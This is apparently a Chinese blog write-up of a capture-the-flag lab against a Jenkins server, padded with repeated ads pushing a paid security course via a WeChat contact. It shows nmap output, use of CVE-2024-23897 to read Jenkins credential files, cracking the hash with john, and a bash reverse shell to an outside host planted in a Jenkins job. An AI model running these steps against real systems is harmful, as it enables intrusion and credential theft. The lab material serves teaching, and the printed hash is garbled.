学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
信息收集
TCP开放端口扫描
Nmap scan report for 10.10.11.10
Host is up (8.0s latency).
Not shown: 61658 filtered tcp ports (no-response), 3875 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
探测tcp开放端口服务信息
Nmap 7.93 scan initiated Fri Mar 15 13:30:22 2024 as: nmap -v -sC -sT -sV -O -p22,8080, -oA open_port_service -oA open_port_service 10.10.11.10
Nmap scan report for 10.10.11.10
Host is up (0.41s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
8080/tcp open http Jetty 10.0.18
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
|_http-title: Dashboard [Jenkins]
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 13.362 days (since Sat Mar 2 03:51:07 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/…/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Fri Mar 15 13:32:33 2024 – 1 IP address (1 host up) scanned in 130.59 second
Getshell
8080端口
浏览器输入靶机IP后,Jenkins页面,且右下角有明确的版本信息。
浏览器搜索jenkins 2.441 是否存在历史漏洞,发现CVE-2024-23897,然后根据搜索出的文章:
https://github.com/godylockz/CVE-2024-23897
获取py脚本,尝试获取文章中提到的敏感文件,
/var/jenkins_home/users/users.xml
/var/jenkins_home/users/jennifer_12108429903186576833/config.xml
获取到一个密码hash
#jbcrypt:$2a 10 10 10UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a
取出加密字符串并尝试使用john进行破解:
echo ‘$2a 10 10 10UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a’ > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
得到明文密码princess,尝试登录jenkins,成功!
然后开始搜索jenkins的反弹shell方法:
https://github.com/Brzozova/reverse-shell-via-Jenkins
- Go to
New Item->Freestyle job->Execute Windows batch command.
加入反弹shell命令
bash -c “/bin/bash -i >& /dev/tcp/10.10.16.38/9001 0>&1”
点击保存,kali监听本地端口
rlwrap nc -lvnp 9001
注:rlwrap 是 Linux 系统中的一个命令行工具,它的主要作用是为不支持 readline 功能的程序提供 readline 支持。Readline 是一个 GNU 项目,它提供了编辑命令行、保存命令历史记录以及自动完成等功能。
当你在终端中使用某些文本编辑器或者交互式工具时,readline 可以提供非常方便的编辑和导航功能,比如使用方向键移动光标、使用 Ctrl+R 进行历史命令搜索等。然而,并非所有的命令行程序都内置了 readline 支持。
rlwrap 可以在不支持 readline 的程序前作为一个包装器(wrapper),使得这些程序能够借用 readline 的功能。这意味着,通过 rlwrap,你可以在更多的命令行程序中享受到 readline 提供的便捷性。
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
744
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
